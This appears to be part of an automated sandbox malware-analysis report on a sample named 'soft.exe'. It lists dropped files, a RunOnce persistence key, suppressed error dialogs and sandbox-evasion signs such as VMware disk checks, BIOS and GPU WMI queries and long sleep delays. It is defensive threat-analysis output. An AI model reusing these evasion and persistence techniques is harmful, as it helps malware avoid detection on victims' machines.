                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 | 13_2_02B9E8BD
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_iscrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-1LUFJ.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\uninstall\unins000.exe (copy)
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | File created: C:\ProgramData\SSDToolBox\SSDToolBox.exe
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\UNIQTWO[1].file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-TUAE9.tmp
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe | File created: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\libGLESv2.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_shfoldr.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-DUVGJ.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\libEGL.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\uninstall\is-SDRVH.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\sqlite3.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-MMTOB.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\msvcp100.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-PEPS4.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-AN5KL.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-21QH6.tmp
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\UNIQ[1].file
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | File created: C:\ProgramData\SSDToolBox\sqlite3.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\icuin51.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\msvcr100.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-HP0G4.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_setup64.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\Qt5PrintSupport.dll (copy)
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\Qt5Concurrent.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-SE3Q7.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | File created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\icuuc51.dll (copy)
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe | Code function: 14_2_00007FF7444E1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA | 14_2_00007FF7444E1684

                            Boot Survival

                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 | 13_2_02B9E8BD
                            Source: C:\Windows\System32\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Code function: 13_2_00401C5C StartServiceCtrlDispatcherA | 13_2_00401C5C
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus | 12_2_00423C1C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_004241EC IsIconic,SetActiveWindow,SetFocus | 12_2_004241EC
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_004241A4 IsIconic,SetActiveWindow | 12_2_004241A4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient | 12_2_00418394
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_004843A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow | 12_2_004843A8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow | 12_2_0042286C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow | 12_2_0042F2F0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_004175A8 IsIconic,GetCapture | 12_2_004175A8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00417CDE IsIconic,SetWindowPos | 12_2_00417CDE
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement | 12_2_00417CE0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary | 12_2_0041F128
                            Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\soft.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\soft.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe System information queried: FirmwareTableInformation
                            Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,13_2_02B9E9C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1826
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1522
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5136
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4697
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_iscrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\msvcp100.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-PEPS4.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-21QH6.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-AN5KL.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-1LUFJ.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\uninstall\unins000.exe (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\icuin51.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\msvcr100.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-HP0G4.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_setup64.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-TUAE9.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\libGLESv2.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-DUVGJ.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\Qt5PrintSupport.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_shfoldr.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\Qt5Concurrent.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-SE3Q7.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\icuuc51.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\libEGL.dll (copy)
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\uninstall\is-SDRVH.tmp
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-MMTOB.tmp
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Evasive API call chain: GetSystemTime,DecisionNodes graph_11-5972
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_13-62265
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe API coverage: 4.6 %
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe TID: 2060 Thread sleep time: -60000s >= -30000s
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe TID: 3620 Thread sleep time: -420000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880 Thread sleep count: 5136 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 360 Thread sleep count: 4697 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5112 Thread sleep time: -20291418481080494s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1260 Thread sleep time: -120000s >= -30000s
                            Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00452AD4 FindFirstFileA,GetLastError,12_2_00452AD4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00475798 FindFirstFileA,FindNextFileA,FindClose,12_2_00475798
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,12_2_0046417C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,12_2_004645F8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,12_2_00462BF0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,12_2_00498FDC
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,14_2_00007FF7444E204C
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,11_2_00409B78
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: svchost.exe, 00000004.00000002.2530831741.000001C9C5271000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000004.00000002.2530963758.000001C9C527F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
